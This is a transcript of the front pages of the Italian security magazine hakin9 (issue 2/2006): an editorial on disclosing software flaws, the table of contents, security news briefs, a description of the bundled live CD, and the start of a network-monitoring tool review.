hakin9 In breve hakin9.live Strumenti GFI Network Server Monitor 7 SwitchSniffer Prima pagina Sicurezza Wi-Fi WEP, WPA e WPA2 Focus Rootkit per Oracle

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "hakin9 In breve hakin9.live Strumenti GFI Network Server Monitor 7 SwitchSniffer Prima pagina Sicurezza Wi-Fi WEP, WPA e WPA2 Focus Rootkit per Oracle"

Transcript

1

2

3

4 hakin9 Segretario di redazione: Tomasz Nidecki Formaggio svizzero ben confezionato Ultimamente ho notato sulla lista di discussione Full Disclosure una discussione veramente molto interessante. È etico o no portare una notiza a pubblica conoscenza che riguarda una falla nella sicurezza? Lo scenario era il seguente il pentester aveva contattato una ditta informandola di aver trovato una falla nel suo software. Il produttore purtroppo non si era rivelato riconoscente; anzi, aveva reagito in un modo furioso visto che sapeva già da tanto dell'esistenza di questa falla e sperava che comunque nessuno se ne sarebbe accorto. Un tale comportamento suscita per forza un sospetto. Quante falle vengono lasciate nei software commerciali dai fabbricanti stessi che, essendone consapevoli, invece di risolverle le nascondo facendo finta di niente? C'è in particolare una cosa che non mi lascia in pace, perché tutte queste falle sono top secret? Per caso non vengono sfruttate dai produttori come gli spyware (vedi pagina 66)? Forse sono troppo sospettoso, ma non è venuto in mente anche a voi? La politica di nascondere gli errori e le falle nella sicurezza dall'opinione pubblica non è una novità per le enormi corporazioni come Microsoft oppure Oracle (vedi pagina 28). Ai clienti si parla degli standard di massima sicurezza, mentre in realtà questi clienti ricevono un pezzo di formaggio svizzero ben confezionato: in pellicola elegante ed etichetta colorata. All'esterno il prodotto è stupendo e fresco, mentre all'interno puzza ed è pieno di buchi. In tali condizioni vale veramente la pena di trattnersi dall'informare le comunità su Internet sull'esistenza di falle nei software di ditte potenti, se esse stesse non hanno nessun rimorso a mentire? Da un punto di vista vale la pena, non perché si tratti dei produttori, ma piuttosto pensando ai clienti. Una volta rivelata l'informazione sulle falle, gli utenti di un software bucato potranno diventare vittime di probabili attacchi. D'altro canto che cosa sarà se tutti i rischi legati all'esistenza delle falle continueranno ad essere nascosti? A quel punto i clienti continueranno ad essere attaccati ci saranno sempre quelli che sapendo delle falle non tappate le sfrutteranno a fini maligni. Finché non si parla del problema ad alta voce, gli utenti continuano ad essere incoscienti del rischio, visto che il produttore molto probabilmente non vorrà mai eliminare l'errore. Parlare delle falle o non parlarne per niente, secondo voi che cosa è peggiore? Io sono del parere che è giusto portare la notizia a pubblica conoscenza. Così come fa del resto la nostra rivista che con il presente numero lo dimostra di nuovo. Tomasz Nidecki In breve Marek Bettman Le informazioni più importanti dal mondo della sicurezza dei sistemi operativi. hakin9.live Jadwiga Rzepacka-Makara La descrizione del contenuto della versione attuale di hakin9.live allegata alla nostra rivista. Strumenti GFI Network Server Monitor 7 Stefan Lochbihler Uno strumento che permette agli amministratori di scansionare la rete alla ricerca di eventuali errori software o hardware. Consente di rivelare i problemi e di inviare degli avvisi prima ancora che gli utenti li riferiscano. SwitchSniffer Paweł Charnas Uno strumento semplice e gratuito destinato al monitoring delle reti di computer locali, dotato di meccanismi base per l'amministrazione e la rivelazione degli abusi. Prima pagina Sicurezza Wi-Fi WEP, WPA e WPA2 Guillaume Lehembre Presentiamo le debolezze dei metodi di crittografia usati nei collegamenti wireless. Inoltre spieghiamo nei dettagli le regole di funzionamento di WPA e WPA2. Mostriamo anche come superare la protezione di sicurezza WEP, WPA e WPA2. Focus Rootkit per Oracle Alexander Kornburst Grazie a questo articolo capirete il concetto di rootkit nei database. Mostriamo come scrivere semplice rootkit per Oracle. Inoltre presentiamo i metodi della protezione contro i rootkit dei db e le potenziali direzioni di sviluppo di questi metodi dell'attacco. La sicurezza in Windows Server Rudra Kamal Sinha Roy Lo scopo di questo articolo è analizzare la sicurezza in Windows Server Descriviamo quali meccanismi ha implementato Microsoft per proteggere meglio i suoi utenti e come si può superarli. Apprenderete le basi della protezione di Windows hakin9 Nº 2/2006

5 In pratica Il sistema IPS basato a Snort Michał Piotrowski Questo articolo spiega come a base di un computer semplice, tre interfacce ed il programma gratuito Snort si possa costruire il sistema di protezione contro gli attacchi (IPS). Vi mostreremo l'installazione e la configurazione di tale sistema. Tecniche Come superare un firewall di rete Oliver Karow Descriviamo i metodi per superare un firewall di rete. L'articolo vi mostrerà l'uso di questi metodi in pratica. Dall'articolo imparerete come configurare i firewall per impedire gli attacchi Metodi di infezione da spyware Christiaan Beek Presentiamo le tecniche più utilizzate dagli spyware per infettare il sistema Windows. Insegniamo come difendersi dalle minacce e come rimuovere i programmi indesiderati quando i pacchetti per l'eliminazione di spyware non riescono a farlo. Autenticazione del mittente protezione o minaccia Tomasz Nidecki Con il diffondersi dello spam, del phishing e dei joejob che minacciano sempre di più l intera comunità Internet, l autenticazione del mittente è diventato il problema principale della posta elettronica. Ma le soluzioni implementate come patch veloci e sbrigative per gestire i protocolli SMTP, notoriamente insicuri e non funzionanti, invece di risolvere i problemi ne creano di nuovi. Nel prossimo numero Daria Juchnowicz-Bierbasz Anticipazioni sugli articoli, che saranno pubblicati nel prossimo numero di hakin9. Editoriale Microsoft una nuova mariuoleria Tomasz Nidecki Dopo questa sua lettura capirete perchè la Microsoft rende la vita difficile agli utenti delle firme digitali. è pubblicato dalla Software-Wydawnictwo Sp. z o.o. L indirizzo di corrispondenza: Software-Wydawnictwo Sp. z o.o., ul. Piaskowa 3, Varsavia, Polonia Tel , Fax Direttore di pubblicazione: Jarosław Szumski Produzione: Marta Kurpiewska Distribuzione: Monika Godlewska Market Manager: Joanna Bogusławska Segretario di redazione: Tomasz Nidecki CD-ROM: Witold Pietrzak Publishing: Anna Osiecka Copertina: Agnieszka Marchocka Pubblicità: Abbonamenti: Traduzione: Ilaria Scotti Rinaldi, Katarzyna Kruś Correzione: Adriano Toldo, Raffaele Giuliano, Marco Villa Distributore esclusivo per l Italia: Parrini&C. SpA Via Vitorchiano Roma Centr. Tel. 06/ Milano Viale Forlanini 23 Centr. Tel. 02/ In attesa di registrazione al Tribunale. Le persone interessate ad una collaborazione sono pregate di contattarci all indirizzo: Se sei interessato ad acquistare la licenza per la pubblicazione delle nostre riviste, ti invitiamo a contattare: Monika Godlewska tel.: fax: Stampa: 101 Studio, Firma Tęgi La redazione fa tutto il possibile poiché le informazioni pubblicate sulla rivista ed i programmi presentati sui supporti allegati siano corretti, ma comunque non si assume alcuna responsabilità per gli effetti dati dal loro utilizzo; inoltre, non garantisce neanche il corretto funzionamento dei programmi shareware, freeware e public domain forniti con la rivista. Tutti i marchi presentati sulla rivista sono di proprietà delle rispettive ditte e sono stati utilizzati solo a scopo informativo. La redazione non fornisce assistenza tecnica legata all installazione né assistenza legata all utilizzo dei programmi inseriti nel CD allegato alla rivista. I dischi danneggiati in fase di trasporto/spedizione sono sostituiti dalla redazione. La redazione utilizza il sistema di publishing automatico Per la creazione dei grafici e diagrammi è stato utilizzato della società I dischi CD allegati alla rivista sono stati testati grazie ad AntiVirenKit, della società G DATA Software Sp. z o.o. La rivista hakin9 è pubblicata in 7 diverse lingue: PL IT CZ EN DE FR ES ATTENZIONE! La vendita del presente numero e dei numeri arretrati ad un prezzo inferiore di quanto indicato sulla copertina senza il consenso dell editore è considerata come un azione a suo danno e comporta dunque conseguenze a livello legale. Le tecniche presentate negli articoli possono essere utilizzate soltanto nelle proprie reti locali. La redazione non si assume la responsabilità per un uso scorretto delle tecniche proposte e per l eventuale perdita di dati da esso causata. hakin9 Nr 2/2006 5

6 In breve Una rivoluzione nelle protezioni e nell'identificazione La ditta australiana CSIRO ha elaborato la tecnologia DataTraceDNA, che permette di proteggere e di identificare i prodotti grazie all'utilizzo dei codici a barre chimici. DataTrace- DNA integra unici ed indelebili motivi di micromolecole con la struttura molecolare di materiali e di prodotti. Le micromolecole sono invisibili da un occhio umano, possono senza problemi essere interpretate come un codice a barre chimico, con l'utilizzo di un apposito lettore portatile. Il codice a barre chimico è molto complesso ed al tempo stesso molto difficile da falsificare da parte dei contraffattori. Inoltre, non può essere eliminato né cambiato, perché fa parte della struttura del materiale o del prodotto. Attualmente la ditta si è concentrata sull'integrazione della nuova tecnologia con cemento, legno, materiali pirotecnici, colle, vernici, imballaggi e polimeri, sostanze chimiche e confezioni farmaceutiche. I domini.eu non per gli Svizzeri In base alle normative della Comunità Europea gli abitanti della Svizzera non potranno registrare i loro indirizzi nel comune dominio europeo.eu. Nonostante questo paese sia situato proprio al centro dell'europa, il diritto di possedere gli indirizzi nel nuovo dominio europeo spetta soltanto ai paesi che fanno parte della Comunità Europea. Beat Fehr, il capo di una delle due aziende Internet svizzere, alle quali è stata assegnata la licenza per vendere gli indirizzi nel dominio.eu, è molto preoccupato per questa informazione. A suo parere, i consorzi svizzeri tra l'altro Nestle e Swatch perderanno i loro domini europei a beneficio di astuti imprenditori stranieri che registreranno in tutta fretta gli indirizzi con i nomi delle ditte menzionate. Egli ammette anche che il dominio stesso.eu dovrebbe essere assegnato a tutti i paesi del Vecchio Continente. Però i dibattiti condotti tra la Commissione Svizzera per la Comunicazione e la Commissione Europea non hanno portato ai risultati attesi. In situazione simile alla Svizzera, si sono trovati anche altri paesi europei che non fanno parte della Comunità Europea Islanda, Liechtenstein e Norvegia. Skype pericoloso La ditta Info-Tech, che si occupa di analisi nel settore IT, avverte che, ovunque abbiamo a che fare con soluzioni business, l'applicazione Skype dovrebbe essere senza indugio aggiunta alla lista delle applicazioni che non dovrebbero essere installate e tanto meno utilizzate. Skype è una delle imprese Internet con il maggiore sviluppo già adesso vanta 54 milioni di utenti in 225 paesi di tutto il mondo. È considerato uno dei leader di mercato praticamente in tutti i paesi in cui funziona. Circa 17 milioni di utenti registrati del programma Skype lo utilizzano per scopi business. Finché non entreranno in vigore specifiche di sicurezza più restrittive riguardanti questa soluzione, questi 17 milioni di utenti sono un ideale backdoor per gli intrusi dice un impiegato della Info-Tech. Secondo Info-Tech, i peccati cardinali di Skype sono: la codifica utilizzata in Skype ha carattere chiuso, quest'applicazione è molto vulnerabile ad attacchi di tipo man-inthe-middle, sono sconosciuti i meccanismi di gestione delle chiavi, la comunicazione a livello business tramite Skype può rendere la vita dei nostri utilizzatori più difficile, poiché molte istituzioni hanno aggiunto l'applicazione Skype ai loro libri neri, Skype non è compatibile con i firewall più diffusi, perciò un errore scoperto nell'applicazione oppure un attacco diretto all'applicazione stessa verrà senza problemi tralasciato da un tipico firewall. Da quando il conosciutissimo gigante mondiale delle aste Internet ebay, decise di comprare Skype un potentato nel mercato della telefonia Internet, tra gli specialisti per la sicurezza di rete si scatenò il pandemonio. L'olio sul fuoco lo gettò l'intervento di Joseph E. Sullivan (del reparto di ebay per la collaborazione con le aziende governative) durante la conferenza CyberCrime2003. Veramente i dati personali degli utenti di Skype sono facilmente accessibili e la loro privacy minacciata? Scott Granneman sul SecurityFocus cita l'enunciato, ferale per gli utenti di Skype, di un impiegato di ebay dalla conferenza CyberCrime2003: Studiando le questioni legate alle truffe su ebay ho imparato che la mia ditta esercita probabilmente la politica più favorevole ed aperta riguardo la condivisione delle informazioni private dei nostri utenti; basta rappresentare una qualsiasi agenzia che si occupa dell'applicazione della legge e, inviandoci via fax su carta intestata una domanda di richiesta di informazioni sull'anagrafica di qualsiasi utente del portale di aste, tutti i particolari della sua attività verranno inviati. Tutto questo senza alcun mandato giudiziario! L'instant messenger Skype è presentato dai suoi autori come pienamente sicuro (codifica di conversazione con algoritmo AES, e RSA per negoziare una chiave) però, dato che il suo codice sorgente non è stato svelato, possiamo soltanto ipotizzare fidandoci sulla parola dei programmatori, che le informazioni trasmesse via Skype sono conosciuti soltanto a noi ed al ricevente... Sapendo quanto è facile ricavare i dati personali di qualsiasi utente del portale ebay, il fatto che il nuovo proprietario di Skype eserciti una politica della protezione di dati personali così debole non solo provoca una generale preoccupazione tra gli specialisti per la sicurezza IT, ma incute anche spavento tra gli utenti comuni. Per chi non vuole rischiare di lasciare i propri dati personali nelle mani di persone inidonee, cercare un'alternativa per la telefonia Internet VoIP servita da Skype non è poi molto difficile. Oltre a Skype, sul mercato va preso in considerazione praticamente soltanto un instant messenger Gizmo. Anche questo utilizza la codifica forte, però possiede il vantaggio che per la comunicazione usa il protocollo aperto SIP e XMMP/Jabber (comunicazione testuale). 6 hakin9 Nº 2/2006

7 In breve Un nuovo worm una minaccia per Linux In Internet si sta diffondendo un nuovo worm, con il nome Lupper, il quale attacca i computer che lavorano con sistema Linux. Sulle macchine infette il worm lascia aperte delle backdoor, concedendo in questo modo ai cracker una possibilità di prendere il controllo remoto sul sistema. La falla che permette al worm l'attività nociva si trova in XML- RPC per PHP, quindi la minaccia riguarda soprattutto i computer sui IT UNDERGROUND 2006 L 'accesso alla rete globale, sempre più ampio ed illimitato, ha fatto sì che si debba far fronte a minacce che fino a poco tempo fa si potevano incontrare soltanto nelle visioni futuristiche di scrittori e registi. Le capacità di calcolo sempre crescenti dei computer, i collegamenti a banda larga appartenenti alla società di Internet costringono le persone responsabili per la sicurezza della rete ad una costante vigilanza, alla capacità di identificare e di neutralizzare le minacce. Tutti questi temi verranno discussi durante la Conferenza IT UNDERGROUND 2006, la più grande in Europa. Acquisiremo tra l'altro conoscenze sui metodi d'attacco, sui modi di difesa, sulla sicurezza delle reti senza fili e sull'analisi post-intrusione. Gli argomenti delle sessioni: Attacchi alle applicazioni UNIX, Attacchi alle applicazioni Windows, Tecniche per spezzare le protezioni, Analisi del codice binario e sorgente, Sicurezza dei servizi Web Services, Sicurezza dei database, Sicurezza dell'hardware, Scansione ed analisi della rete, Anonimato e privacy in Rete, Crittografia, Hardening dei sistemi UNIX, Hardening dei sistemi Windows, Analisi post-intrusione dei sistemi Unix/Linux, quali sono state installate le applicazioni WordPress, Drupal, PostNuke, o TikiWiki. Per fortuna, finora, sono state osservate pochissime infezioni riuscite, e la società McAfee definisce basso il livello di rischio legato all'infezione con il worm Lupper. D'altro canto la Symantec definisce questo rischio come medio anche se afferma che il numero delle infezioni rilevate è per adesso molto limitato. Analisi post-intrusione dei sistemi Windows, Sicurezza delle reti senza fili (Wi- Fi, Bluetooth), Rootkits e backdoors nei sistemi UNIX, Rootkits e backdoors nei sistemi Windows, Canali nascosti e steganografia di rete, Analisi di worms, malware e spyware, Certificati di sicurezza - PKI, Reverse Engineering, Ingegneria sociale, Aspetti giuridici, BYOL. Una parte delle conferenze si terrà in forma BYOL (Bring Your Own Laptop). I partecipanti potranno avviare i propri computer da un CD appositamente preparato contenente le distribuzioni hakin9.live, e poi fare un'intrusione ad una rete di test utilizzando le tecniche descritte dal conferenziere o difendersi dall'attacco effettuato dagli altri partecipanti. Le prossime Conferenze: IT UNDERGROUND 2006, aprile Gran Bretagna, IT UNDERGROUND 2006, giugno Spagna, IT UNDERGROUND 2006, settembre Italia. Informazioni dettagliate riguardanti le imprese si possono trovare su: La Microsoft apre le specifiche dei file MS Office Il gigante di Redmond ha annunciato che renderà accessibile il formato dei file Office XML ed ha presentato la domanda all'organizzazione internazionale per la standardizzazione ECMA per far riconoscere questo formato come uno standard di settore. Sembra che la Microsoft abbia finalmente capito che il suo atteggiamento intransigente riguardo la questione dell'apertura di alcuni formati dei file può essere molto svantaggioso. Specialmente a proposito dei file dal pacchetto da ufficio, dove è sorto un forte concorrente, cioè il formato OpenDocument. Microsoft ha annunciato la pubblicazione degli speciali strumenti che permetteranno la conversione dei dati memorizzati nel vecchio formato ai file Office XML. Le lettere falsificate dalla FBI austriaca Un equivalente austriaco alla FBI americana Ufficio Federale Criminale avverte riguardo ad i cui autori si spacciano per tale Ufficio. Le ricevono soprattutto gli abitanti di Austria, Germania e Svizzera, ma anche di altri paesi europei. Nel contenuto della lettera il ricevente può leggere che sta utilizzando software pirata. Nel file allegato alla lettera si trova una delle versioni del virus Sober. L'Ufficio Federale Criminale mette in guardia dall'aprire l'allegato ed informa che non ha niente in comune con di questo tipo. ISSA ormai in Polonia Dal novembre dell'anno scorso anche nel nostro paese funziona la filiale dell'organizzazione ISSA (International Security Systems Association). Proprio allora sono stati terminati i lavori legati alla registrazione di ISSA Polska. L'associazione radunerà gli specialisti che si occupano delle questioni di sicurezza informatica, tra questi anche il personale amministrativo delle ditte di questo settore. Uno dei modi per organizzare meglio quest'ambiente saranno incontri mensili durante i quali verranno trattati ed analizzati i più importanti problemi legati alla sicurezza IT. Può darsi che la collaborazione aiuti a trovare più facilmente il modo per risolvere alcuni problemi. hakin9 Nº 2/2006 7

8 In breve Un altro errore critico in Internet Explorer La società britannica Computer Terrorism ha presentato un codice malizioso che sfrutta una nota falla in Internet Explorer per prendere il controllo sul computer. La falla è conosciuta dal 31 maggio di quest'anno. Inizialmente è stata definita come poco pericolosa, perché permetteva appena di effettuare un attacco di tipo DoS (denial-of-service). Adesso, dopo la prova data dai Britannici che questa falla permette di prendere il controllo su un computer, viene valutata come critica. È il più alto grado di pericolosità possibile. L'errore deriva dal modo di gestione del codice JavaScript da parte del browser. Se un internauta dovesse visitare una pagina Web adeguatamente preparata, il suo autore potrà esegure sul suo computer qualsiasi codice. Gli esperti consigliano di disattivare in Internet Explorer la gestione di JavaScript (provocando notevoli disagi nell'utilizzo di Rete), oppure di utilizzare un altro browser. Windows via Internet La ditta Microsoft ha annunciato che una parte delle applicazioni dell'ambiente Windows verrà spostata dai dischi rigidi ad Internet. Secondo Bill Gates, il nuovo sito Internet, chiamato Windows Live, permetterà di utilizzare molte applicazioni Windows in qualsiasi posto e momento. Il fondatore della Microsoft ha sottolineato però che, sia il nuovo servizio che la gemella Windows Office, non sostituiranno completamente il software installato sui dischi rigidi. Il nuovo sito Internet dovrà facilitare l'accesso a molte applicazioni Windows da parte di oltre 28 milioni di clienti del settore delle piccole e medie industrie di tutto il mondo, offrendo le estensioni delle applicazioni standard di Office ed alcuni nuovi servizi, che di solito stanno fuori dalla portata finanziaria dei clienti di questo settore. Office Live per adesso verrà fornito ad un ristretto gruppo di clienti. Windows Live verrà offerto per abbonamento e già adesso viene considerato come la risposta della Microsoft alle nuove idee delle società Google e Yahoo. Speriamo che il nuovo prodotto del gigante di Redmond sia fornito di protezioni migliori in confronto ai suoi fratelli maggiori. Una falla in itunes Secondo le ultime notizie dalla ditta eeye, nelle protezioni del software itunes è stato scoperto un grave errore, che permette di prendere il controllo del computer dell'utente. Fino ad ora mancano commenti a riguardo da parte del consorzio Apple. Sulla pagina di eeye si può leggere che l'errore in itunes permette un avvio non autorizzato di codice su una macchina attaccata. I dettagli riguardo alla falla non sono stati svelati. È noto che il problema delle falle nel codice riguarda diverse versioni del programma compresa la più recente, indicata dal numero 6. Il problema riguarda esclusivamente le versioni per il sistema Windows. La sicurezza d'internet minacciata Un team di scienziati finlandesi dell'università di Oulu ha scoperto una grave falla nell'implementazione del protocollo ISAKMP (Internet Security Association and Key Management Protocol), utilizzata nei prodotti di Cisco e di Juniper Networks. La falla scoperta è tanto seria che gli esiti delle ricerche degli scienziati finlandesi hanno guadagnato immediatamente la celebrità, grazie al Centro Nazionale Britannico per la Coordinazione della Sicurezza di Rete e grazie al CERT finlandese. In modo particolare sono minacciate le barriere di rete delle ditte Cisco Systems e Juniper Networks. Entrambi i consorzi sono già stati avvertiti della nuova minaccia. I rappresentanti della ditta Cisco hanno ammesso che un pacchetto adeguatamente preparato può causare un momentaneo riavvio dei dispositivi, che permette un attacco di tipo DoS. La ditta fornisce già aggiornamenti gratuiti del suo software. Tra i prodotti minacciati della ditta ci sono le applicazioni Cisco IOS, Cisco PIX Firewall, Cisco Firewall Services Module, Cisco VPN 3000 Series Concentrators e Cisco MDS Series SanOS. Anche il consorzio Juniper ha reagito alla minaccia notificata, annunciando che l'intero software della società messo in circolazione dopo il 28 luglio possiede ormai le adeguate protezioni. Tra i prodotti, che si sono trovati sulla lista dei più minacciati, ci sono i router della serie M, T, J ed E, ed anche la maggior parte delle versioni del software Junos e JunoSE Security. La sicurezza dei browser Internet produttori dei browser Internet più I diffusi hanno dibattuto insieme sul modo in cui difendersi dalle minacce che arrivano da Internet. Gli impiegati di Microsoft (Internet Explorer), di Mozilla Foundation (Firefox), di Opera Software (Opera) ed i creatori di Konqueror si sono incontrati a Toronto durante una sessione congiunta organizzata dagli sviluppatori di KDE. Il tema principale dei dibattiti è stata l'elaborazione di modi per far rendere possibile il riconoscimento da parte dei browser dei siti degni di fiducia e di quelli che creano una minaccia. Inoltre si è riflettuto anche sul modo di proteggere la tecnologia pop-up, affinché i cyberdelinquenti non riescano a sfruttarla per strappare i dati personali. Una delle soluzioni proposte è stato il cambiamento del colore della barra d'indirizzo, dipendentemente dal livello di fiducia e dal livello delle protezioni utilizzate sul sito visitato. Sulla barra dovrebbero apparire anche le icone che indicano l'attivazione della trasmissione codificata di dati da parte del sito. Inoltre, ogni finestra aperta visualizzerebbe l'indirizzo dal quale è stato scaricato il suo contenuto. Questo principio riguarderebbe anche i finestrini pop-up o i moduli. Non è noto, però, se i modi di protezione elencati verranno applicati in tutti i browser. I rappresentanti di Firefox e di Konqueror hanno costatato infatti che possono soltanto consigliare, ma non imporre, qualcosa alle persone che lavorano su questi programmi. 8 hakin9 Nº 2/2006

9 In breve Una reclusione pluriennale per un cyberdelitto Due Nigeriani sono stati condannati a diversi anni di reclusione per la più grande vicenda nella storia di questo paese legata al furto di denaro tramite Internet. Emmanuel Nwude passerà in prigione 25 anni, mentre Nzeribe Okoli 12, dopo aver rubato da una banca brasiliana 242 milioni di dollari. Inoltre, dovranno pagare 121,5 milioni di dollari di risarcimento alle vittime del delitto, tra le quali si annoverano i clienti del Banko Noroeste di Sao Paulo. L'attività dei Nigeriani ha condotto la banca al fallimento. Il terzo degli accusati, Amaka Anajemba, ha accettato di pagare 48,5 milioni di dollari di risarcimento ed è stato condannato a due anni e mezzo di reclusione. I delinquenti hanno spillato i soldi dalla banca offrendo ai suoi impiegati grandi provvigioni in cambio della mediazione in una fittizia costruzione di un aeroporto nella capitale della Nigeria, Abuja. Le frodi di questo tipo soltanto negli Stati Uniti fruttano, Le nuove protezioni dei film Durante la conferenza dell'organizzazione DVD Forum, che si è svolta a Parigi, è stata presentata una tecnologia, il compito della quale sarà la protezione dalla riproduzione e divulgazione non autorizzata dei film venduti sui dischi HD-DVD. Il sistema delle filigrane sonore è stato presentato da Allan Bell, del consorzio Warner Brothers. Tutti i lettori HD-DVD verranno forniti di un sensore che verificherà le filigrane, inudibili da un orecchio umano, racchiuse nella colonna sonora dei film. Tramite la nuova soluzione verranno protette tutte le maggiori produzioni lanciate sugli schermi dei cinema. Quando un lettore scoprirà il codice nascosto, considererà il supporto una copia illegale e renderà impossibile la sua lettura su tale dispositivo. In questo modo il settore cinematografico vuole eliminare le copie pirata dei film registrati con una cinepresa digi- a danno degli ingenui, circa 1 milione di dollari al giorno così succede già da molti anni e questo fenomeno si intensifica sempre di più. Per la Nigeria è il terzo, prendendo in considerazione i ricavi, ramo dell'industria. Attualmente in molti paesi del mondo ogni lettera, o quasi, proveniente dalla Nigeria, dalla Repubblica Sudafricana, dallo Zimbabwe, Angola, Sierra Leone o dalla Costa d'avorio, viene considerata come un preambolo per spillare soldi. Dal 1999 in Nigeria funziona un agenzia del Secret Service Americano però, nonostante questa e le centinaia di arresti effettuati, il business illegale funziona su scala sempre più grande e coinvolge sempre più paesi del mondo. Purtroppo risulta che il governo nigeriano non intende collaborare a combattere quest'attività finora il tribunale nigeriano non ha condannato nessuno ai sensi del 419 CP e nessuna delle vittime ha ottenuto un risarcimento. tale durante gli spettacoli di cinema in anteprima. I dischi HD-DVD per l'uso domestico conteranno anch'essi una filigrana sonora, che, sarà però diversa dalla versione da cinema. Verranno rilevate le copie dei film sia bruciate in masterizzatori DVD, sia riprese tramite una cinepresa digitale dallo schermo di un televisore. Dopo aver scoperto una copia illegale la protezione spegnerà il lettore. Inoltre, poco tempo fa, al blocco dei sostenitori del formato HD-DVD si è unita anche la Microsoft, il che permette di supporre che le nuove tecnologie di protezione verranno implementate anche in Windows. Speriamo che il sistema di protezione basato sulle filigrane sonore non possieda delle proprietà nascoste, come il software di Sony per la protezione dei dischi audio, o la maggior parte delle stampanti laser prodotte sul territorio degli Stati Uniti. BIN GigaCon La Sicurezza e l'infallibilità dei Sistemi Informatici la più grande conferenza in Europa Centrale dedicata alla sicurezza ed all'infallibilità dei sistemi informatici già quest'anno si svolgerà anche in Germania ed in Francia. Finora in Polonia hanno avuto luogo sei edizioni di quest'incontro, invece nella Repubblica Ceca tre. Ogni incontro raduna migliaia di partecipanti e decine di ditte celebri che presentano le loro soluzioni. La decisione presa dagli organizzatori della conferenza, ossia dalla ditta Software Konferencje, di organizzare l'incontro in Francia ed in Germania è un evento molto importante per tutte le persone che si occupano quotidianamente della sicurezza dei sistemi informatici. Ogni edizione consta di oltre 30 conferenze e di 3 sessioni tematiche parallele, accompagnate inoltre dalle sessioni tecniche. La partecipazione è gratuita. La rivista hakin9 era presente durante tutte le edizioni sia in Polonia che nella Repubblica Ceca. Ci saremo anche in Germania ed in Francia. Vi invitiamo. Chi attacca le reti militari americane? Il governo cinese assume hacker che effettuano intrusioni alle reti militari americane. Gli esperti hanno rivelato informazioni su un gruppo di persone che lavorano per il governo di Pechino. Gli hacker, che hanno la loro sede probabilmente nella provincia di Guangdong, hanno rubato molti documenti segreti americani. Tra le informazioni rubate ci sono particolari riguardanti la costruzione di aerei e il software per pianificare i percorsi dei voli. Secondo l'opinione di Alan Paller, il direttore di SANS Institute, che ha studiato i casi delle intrusioni e dei furti dei dati segreti, il gruppo di hacker conta 20 persone. Il governo americano ha chiamato il gruppo Titan Rain e per combatterlo ha ingaggiato tra l'altro l'hacker soprannominato Shawni Carpenter, che è riuscito a fare un'intrusione nei computer utilizzati dai Cinesi. In Rete si è diffusa anche l'opinione che l'intera vicenda sia stata montata dagli Americani in cerca di una scusa per monitorare, in modo legale, l'attività della Cina nel campo informatico. hakin9 Nº 2/2006 9

10 hakin9.live Contenuto del CD Nel disco allegato alla rivista si trova hakin9.live (h9l) nella versione 2.9-ng la distribuzione bootable di Linux che contiene strumenti utili, documentazione, tutorial e materiali supplementari agli articoli. Per cominciare il lavoro con hakin9.live basta avviare il computer da CD. Dopo l'avvio del sistema è sufficiente inserire il nome dell'utente hakin9 senza fornire password. I materiali supplementari sono stati collocati nelle seguenti directory: doc la documentazione nel formato HTML, hit hit del presente numero: Shadow Security Scanner, un ottimo scanner di vulnerabilità la versione completa per 5 indirizzi IP. Per ottenere i codici che rendono accessibile la versione gratuita di questo programma occorre installare la versione del programma presente sul disco hakin9.live ed inviare all indirizzo un messaggio con il titolo Hakin9-Safety-lab SSS offer. La promozione è valida fino al 31 maggio 2006, art i materiali supplementari agli articoli: listing, script, programmi indispensabili, tut i tutorial, add i libri ed altri documenti nel formato PDF (tra l'altro Using PGP/GnuPG and S/MIME with , ICMP attacks against TCP, Host Fingerprinting and Firewalking With hping, Writing Stack Based Overflows on Windows (4 pats + Examples), rfc il set degli documenti RFC aggiornati. I materiali archiviali sono stati collocati nelle directory _arch, invece i nuovi nelle directory principali seguendo la struttura menzionata sopra. Nel caso di esplorazione del disco dall'interno di hakin9.live avviato, la struttura di sopra è accessibile dalla sottodirectory /mnt/cdrom. La versione 2.9-ng h9l l'abbiamo costruita in base alla distribuzione Gentoo Linux ed agli script livecd- tools. Gli strumenti inaccessibili nel repository Gentoo vengono installati dai pacchetti collocati nella directory /usr/local/portage o vengono registrati alla directory /usr/local/bin. Nel confronto con h9l 2.8-ng abbiamo cambiato la versione del kernel (attualmente con le patch gentoo-sources r4). Abbiamo aggiornato i pacchetti per le versioni i più nuove e stabili. Abbiamo aggiunto i nuovi driver per le carte wireless PCI e USB. Nella versione attuale di h9l compaiono tra l'altro i programmi: ap-utilis la raccolta di strumenti per la configurazione degli Access Point, mrtg la supervisione della carico dei collegamenti di rete, ekg2 comunicatore di consolle che serve tra l'altro i protocoli come Jabber. Inoltre il programma Nessus è stato aggiornato alla versione Nel nuovo h9l si trova il programma d'installazione (la versione modificata degli script di Knoppix). Dopo l'installazione sul disco per installare il software supplementare si può utilizzare portage (il comando emerge). L'ambiente grafico di h9l è Fluxbox con il file manager ROX. Tutorial e documentazione La documentazione consiste tra l'altro nei tutorial preparati dalla redazione che contengono esercizi pratici. Premettiamo che l'utente utilizzi hakin9.live. Grazie a questo eviterà i problemi legati alle diverse versioni dei compilatori, alla differente localizzazione dei file di configurazione, oppure alle opzioni indispensabili per l'avvio del programma in un dato ambiente. Fig. 1: Sempre più strumenti utili Fig. 2: Shadow Security Scanner 10 hakin9 Nº 2/2006

11 Se non riesci a leggere il contenuto del CD, e non presenta danni meccanici, controllalo almeno su due CD driver. In caso di problemi con il CD scrivete all indirizzo:

12 GFI Network Server Monitor 7 Strumenti Sistema operativo: Windows NT4/2000/XP/2003 Licenza: Commerciale con versione di prova di 10 o 30 giorni Destinazione: Monitoraggio della rete e del server alla ricerca di errori Homepage: GFI Network Server Monitor è uno strumento che permette agli amministratori di scansionare la rete alla ricerca di eventuali errori software o hardware. Consente di rilevare i problemi e di inviare degli avvisi prima ancora che gli utenti li riferiscano. Partenza veloce: Supponiamo di essere un amministratore di una rete formata da un server Win 2003 e da un server SUSE con un servizio HTTP, SSH e FTP. Stiamo cercando un software che sia in grado di monitorare costantemente i nostri servizi e di informarci immediatamente della presenza di un errore. Il GFI Network Server Monitor è quello che stiamo cercando. Incominciamo a impostare alcuni controlli basilari sul sistema SUSE. A tale scopo è necessario creare una nuova cartella che conterrà le nostre regole e impostazioni per il monitoraggio del sistema. Selezioniamo l'opzione Monitoring Checks Configuration (Configurazione dei controlli di monitoraggio) dalla barra degli strumenti e clicchiamo sul tasto destro per creare una nuova cartella. Se clicchiamo di nuovo sulla cartella con il tasto destro saremo in grado di modificare le proprietà dei controlli del monitor. Per prima cosa, inseriamo l'ip/hostname del nostro host (su cui 